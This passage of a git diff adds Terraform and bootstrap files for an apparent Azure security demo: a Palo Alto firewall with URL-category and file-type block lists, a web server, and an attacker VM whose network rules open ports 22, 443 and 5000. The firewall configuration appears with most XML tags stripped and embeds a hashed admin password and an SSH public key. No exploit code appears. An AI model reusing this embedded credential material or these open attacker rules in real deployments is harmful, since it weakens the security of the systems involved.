"Mgmt_Subnet_CIDR" {} +variable "Untrust_Subnet_CIDR" {} +variable "Trust_Subnet_CIDR" {} +variable "AppGW_Subnet_CIDR" {} +variable 
"Web_Subnet_CIDR" {} +variable "Attack_Subnet_CIDR" {} +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "FW_Trust_IP" {} +variable "WebLB_IP" {} +variable "Web_IP" {} +variable "Attack_IP" {} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf b/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf new file mode 100644 index 00000000..3fa38e0a --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf @@ -0,0 +1,18 @@ +resource "random_id" "storage_account" { + byte_length = 8 +} + +resource "azurerm_storage_account" "jenkins" { + name = "${lower(random_id.storage_account.hex)}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + location = "${azurerm_resource_group.resourcegroup.location}" + account_tier = "Standard" + account_replication_type = "LRS" +} + +resource "azurerm_storage_share" "bootstrap" { + name = "bootstrap" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + storage_account_name = "${azurerm_storage_account.jenkins.name}" + quota = 1 +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml new file mode 100644 index 00000000..e528f907 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml @@ -0,0 +1,2620 @@ + + + + + + $1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + Panorama + 1.2.3.4 + test@yourdomain.com + test@yourdomain.com + + + + + + + + + UDP + 514 + BSD + 1.2.3.4 + LOG_USER + + + + + + + + + Sample_Email_Profile + + (severity eq critical) + Email Critical System Logs + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + traffic + All Logs + no + + Sample_Syslog_Profile + + + + threat + All Logs + no + + Sample_Syslog_Profile + + + + + Sample_Email_Profile + + Email Malicious Wildfire Verdicts + wildfire + (verdict eq malicious) + no + + + + Sample_Email_Profile + + Email Phishing Wildfire Verdicts + wildfire + (verdict eq phishing) + no + + + wildfire + All Logs + no + + Sample_Syslog_Profile + + + + url + All Logs + no + + Sample_Syslog_Profile + + + + data + All Logs + no + + Sample_Syslog_Profile + + + + gtp + All Logs + no + + Sample_Syslog_Profile + + + + tunnel + All Logs + no + + Sample_Syslog_Profile + + + + auth + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + last-7-calendar-days + 500 + 50 + Host-visit malicious sites plus + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + category + action + + + 
repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit malicious sites + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit questionable sites + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Host-visit quest sites plus + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + Detail of hosts visiting questionable URLs + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire malicious verdicts + daily + (app neq smtp) and (category neq benign) + Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire verdicts SMTP + daily + (app eq smtp) and (category neq benign) + Links sent from emails found to be malicious. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + subject + sender + recipient + misc + + + + + + last-30-calendar-days + 500 + 50 + Clients sinkholed + (rule eq 'DNS Sinkhole Block') + daily + + + repeatcnt + from + + src + srcuser + + + repeatcnt + + + + + + + + + + Clients sinkholed + + + Wildfire malicious verdicts + + + Wildfire verdicts SMTP + + + Hosts visit malicious sites + + + Host-visit malicious sites plus + + + Hosts visit questionable sites + + + Host-visit quest sites plus + + + yes + + + Possible Compromise + + + + + + + Possible Compromise + + + + Sample_Email_Profile + + + + + + + + + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + + + + + 2 + 100 + + + + + + 10 + 100 + + + + + + 2 + 100 + + + yes + yes + yes + no + global + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + + + + WebFW1 + UTC + updates.paloaltonetworks.com + yes + + + 10.0.0.2 + 10.0.0.2 + + + Gold 1.0 - PANOS 8.0 + + yes + yes + + + + + + + + + + + yes + no + no + no + + + + + + + 00:00 + download-and-install + + 48 + + + + yes + yes + yes + yes + yes + yes + yes + yes + + + + + 3 + download-and-install + + + + + + + + yes + + + FQDN + + + + yes + no + no + no + + + 
c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + 8.8.8.8 + 8.8.4.4 + + + + yes + yes + + + + + 10 + + + 30 + + + 1000 + + + 2000 + + + 5 + + + 5 + + + 1 + + + 10 + + + 2 + + + yes + yes + + + yes + + + no + + + + + + + + + + + + + + + + ELB-HealthChecker/2.0 + http-req-headers + + + + + + + session + no + + + infrastructure + networking + browser-based + 1 + + + + + + + + + + + + allow + no + yes + + + Inbound + + + default + + + deny + no + yes + default + + + + + + + + + + + financial-services + government + health-and-medicine + Custom-No-Decrypt + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + yes + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + any + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + + + + + + + Outbound to the Internet + + + Inbound from the Internet + + + Internal to Internal + + +

+ + 2600:5200::1 + + + 10.0.1.10 + +
+ + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt + IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt + IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + + + + + yes + yes + yes + yes + yes + yes + + + yes + yes + + + no + no + + + yes + yes + + + tls1-2 + no + no + no + no + + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + + + + + any + + + any + + both + alert + + + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + + any + any + single-packet + + + + + + + low + informational + medium + + any + any + disable + + + + + + + + + + + + + + 2600:5200::1 + + disable + + + + + + + + any + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + + + + + extended-capture + + pan-sinkhole-default-ip + ::1 + + + + + + + + + any + + any + any + single-packet + + + + + + + + + + + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + 
alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + 
auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + 
Custom-No-Decrypt + + + block + yes + yes + yes + no + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + + + + + + + + medium + + Black-List + Custom-No-Decrypt + White-List + + + block + yes + yes + yes + no + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + White-List + + + + + + + + alert + alert + + + alert + alert + + + default + default + + + default + default + + + alert + alert + + + default + default + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + default + + + default + default + + + reset-both + reset-both + + + reset-both + reset-both + + + default + default + + + reset-both + reset-both + + + Use this profile for rules needing modifications to the standard + + + + + drop + drop + + + drop + drop + + + drop + drop + + + 
drop + drop + + + drop + drop + + + drop + drop + + + yes + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + medium + + + any + + any + any + any + disable + + + + + + + + + + + any + + + any + + + any + + any + any + any + disable + + + + + + + + + + + + any + + + critical + high + medium + low + + + any + + any + any + any + single-packet + + + + + + + Internal + + + informational + + + any + + any + any + any + disable + + + + + + + any + + + informational + + + any + + any + any + any + extended-capture + + + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + Inbound-AV + + + Inbound-AS + + + Inbound-VP + + + Inbound-FB + + + Inbound-WF + + + + + Internal-AV + + + Internal-AS + + + Internal-VP + + + Internal-FB + + + Internal-WF + + + + + Alert-Only-AV + + + Alert-Only-AS + + + Alert-Only-VP + + + Alert-Only-URL + + + Alert-Only-FB + + + Alert-Only-WF + + + + + + + + + + + + + + diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt new file mode 100644 index 00000000..a8b71315 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt @@ -0,0 +1,2 @@ +dns-primary=8.8.8.8 +dns-secondary=8.8.4.4 \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/firewall.tf b/azure/Jenkins_proj-working/WebInDeploy/firewall.tf new file mode 100644 index 00000000..f5a09753 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/firewall.tf @@ -0,0 +1,50 @@ +#### CREATE THE FIREWALL #### + +resource "azurerm_virtual_machine" "firewall" { + name = "firewall" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + network_interface_ids = + [ + "${azurerm_network_interface.fwmanagement.id}", + "${azurerm_network_interface.fwuntrust.id}", + "${azurerm_network_interface.fwtrust.id}" + ] + + primary_network_interface_id = "${azurerm_network_interface.fwmanagement.id}" + vm_size = "Standard_D3_v2" + + plan { + name = "bundle2" + publisher = "paloaltonetworks" + product = "vmseries1" + } + + storage_image_reference { + publisher = "paloaltonetworks" + offer = "vmseries1" + sku = "bundle2" + version = "8.1.0" + } + + storage_os_disk { + name = "firewall-disk" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + delete_os_disk_on_termination = true + delete_data_disks_on_termination = true + + os_profile { + computer_name = "pa-vm" + admin_username = "${var.Admin_Username}" + admin_password = "${var.Admin_Password}" + custom_data = 
"storage-account=${var.Bootstrap_Storage_Account},access-key=${var.Storage_Account_Access_Key},file-share=${var.Storage_Account_Fileshare},share-directory=${var.Storage_Account_Fileshare_Directory}" + } + + os_profile_linux_config { + disable_password_authentication = false + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf b/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf new file mode 100644 index 00000000..7669c85c --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf @@ -0,0 +1,55 @@ +#### CREATE THE NETWORK INTERFACES #### + +resource "azurerm_network_interface" "fwmanagement" { + name = "fwmanagement" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + ip_configuration { + name = "fweth0" + subnet_id = "${azurerm_subnet.management.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.FW_Mgmt_IP}" + public_ip_address_id = "${azurerm_public_ip.fwmanagement.id}" + } + depends_on = ["azurerm_public_ip.fwmanagement"] +} + +resource "azurerm_network_interface" "fwuntrust" { + name = "fwuntrust" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + enable_ip_forwarding = "true" + ip_configuration { + name = "fweth1" + subnet_id = "${azurerm_subnet.untrust.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.FW_Untrust_IP}" + } +} + +resource "azurerm_network_interface" "fwtrust" { + name = "fwtrust" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + enable_ip_forwarding = "true" + ip_configuration { + name = "fweth2" + subnet_id = "${azurerm_subnet.trust.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.FW_Trust_IP}" + } +} + +#### WEB SERVER INTERFACES FOR APP1 #### + +resource "azurerm_network_interface" "web1" { + name = "web1eth0" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + ip_configuration { + name = "web1eth0" + subnet_id = "${azurerm_subnet.webservers.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.Web_IP}" + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf new file mode 100644 index 00000000..3dc66140 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf @@ -0,0 +1,15 @@ +#### CREATE THE NETWORK INTERFACES #### + +resource "azurerm_network_interface" "attacker" { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + ip_configuration { + name = "eth0" + subnet_id = "${azurerm_subnet.attacker.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.Attack_IP}" + public_ip_address_id = "${azurerm_public_ip.attacker.id}" + } + depends_on = ["azurerm_public_ip.attacker"] +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf new file mode 100644 index 00000000..539e88a6 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf @@ -0,0 +1,45 @@ +resource 
"azurerm_network_security_group" "Attack_NSG" { + name = "Attack_NSG" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + + security_rule { + name = "Allow-FW-22" + priority = 100 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "22" + source_address_prefix = "*" + destination_address_prefix = "${var.Attack_IP}" + } + + security_rule { + name = "Allow-FW-443" + priority = 101 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "443" + source_address_prefix = "*" + destination_address_prefix = "${var.Attack_IP}" + } + + security_rule { + name = "Allow-FW-5000" + priority = 102 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "5000" + source_address_prefix = "*" + destination_address_prefix = "${var.Attack_IP}" + } +} +resource "azurerm_subnet_network_security_group_association" "attackgroup" { + subnet_id = "${azurerm_subnet.attacker.id}" + network_security_group_id = "${azurerm_network_security_group.Attack_NSG.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf new file mode 100644 index 00000000..c56b2d23 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf @@ -0,0 +1,8 @@ +#### CREATE PUBLIC IP ADDRESSES #### + +resource "azurerm_public_ip" attacker { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + allocation_method = "Static" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf new file mode 100644 index 00000000..6ca1e8a0 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf @@ -0,0 +1,29 @@ +# ********** RESOURCE GROUP ********** + +# Create a resource group +resource "random_id" "attack_resource_group" { + byte_length = 2 +} +resource "azurerm_resource_group" "attackgroup" { + name = "${var.Attack_RG_Name}-${lower(random_id.attack_resource_group.hex)}" + location = "${var.Azure_Region}" +} + +# ********** VNET ********** + +# Create a virtual network in the resource group +resource "azurerm_virtual_network" "attack-vnet" { + name = "attack-vnet" + address_space = ["${var.Attack_CIDR}"] + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" +} + +#### CREATE THE SUBNETS #### + +resource "azurerm_subnet" "attacker" { + name = "attacker" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + virtual_network_name = "${azurerm_virtual_network.attack-vnet.name}" + address_prefix = "${var.Attack_Subnet_CIDR}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf new file mode 100644 index 00000000..c393ebf7 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf @@ -0,0 +1,16 @@ +#### CREATE THE ROUTE TABLES #### + +resource "azurerm_route_table" "attacker" { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + route { + name = 
